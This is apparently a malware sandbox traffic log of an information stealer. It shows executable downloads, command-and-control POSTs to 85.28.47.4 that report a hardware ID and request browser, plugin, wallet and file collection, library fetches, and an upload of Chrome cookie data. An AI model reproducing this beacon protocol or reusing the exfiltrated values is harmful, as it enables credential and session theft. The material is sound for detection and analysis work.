                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:58:17 GMTContent-Type: application/octet-streamContent-Length: 1902080Last-Modified: Thu, 27 Jun 2024 03:06:38 GMTConnection: keep-aliveETag: "667cd73e-1d0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 13 50 4a 58 72 3e 19 58 72 3e 19 58 72 3e 19 03 1a 3d 18 56 72 3e 19 03 1a 3b 18 f8 72 3e 19 8d 1f 3a 18 4a 72 3e 19 8d 1f 3d 18 4e 72 3e 19 8d 1f 3b 18 2d 72 3e 19 03 1a 3a 18 4c 72 3e 19 03 1a 3f 18 4b 72 3e 19 58 72 3f 19 8c 72 3e 19 c3 1c 37 18 59 72 3e 19 c3 1c c1 19 59 72 3e 19 c3 1c 3c 18 59 72 3e 19 52 69 63 68 58 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 57 59 50 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 c4 01 00 00 00 00 00 00 f0 4b 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4c 00 00 04 00 00 80 55 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 80 06 00 6a 00 00 00 00 70 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 cf 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 cf 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 06 00 00 10 00 00 00 d8 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 76 6e 6f 71 70 77 72 00 00 1a 00 00 e0 31 00 00 f2 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6b 69 6b 68 6e 6e 6d 00 10 00 00 00 e0 4b 00 00 04 00 00 00 e0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4b 00 00 22 00 00 00 e4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:04 GMTContent-Type: application/octet-streamContent-Length: 2515456Last-Modified: Thu, 27 Jun 2024 00:29:28 GMTConnection: keep-aliveETag: "667cb268-266200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 4c 58 be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 be 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 70 9c 00 57 0d 00 00 78 7d 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 78 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 30 22 00 00 40 9c 00 00 2e 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 85.28.47.4Content-Length: 212Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 33 37 35 37 39 31 41 30 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="hwid"ED375791A0EA20379026------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build"default------DHCAECGIEBKJKEBGDHDA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCAHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 2d 2d 0d 0a Data Ascii: ------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="message"browsers------CBFCFBFBFBKFIDHJKFCA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="message"plugins------DBKKFCBAKKFBGCBFHJDG--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"fplugins------AFHDAKJKFCFBGCBGDHCB--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 85.28.47.4Content-Length: 6107Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file"------KKEHIEBKJKFIEBGDGDAA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file"------KJKKJKEHDBGIDGDHCFHI--
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="message"wallets------GHJKECAAAFHJECAAAEBF--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="message"files------AEHIDAKECFIEBGDHJEBK--
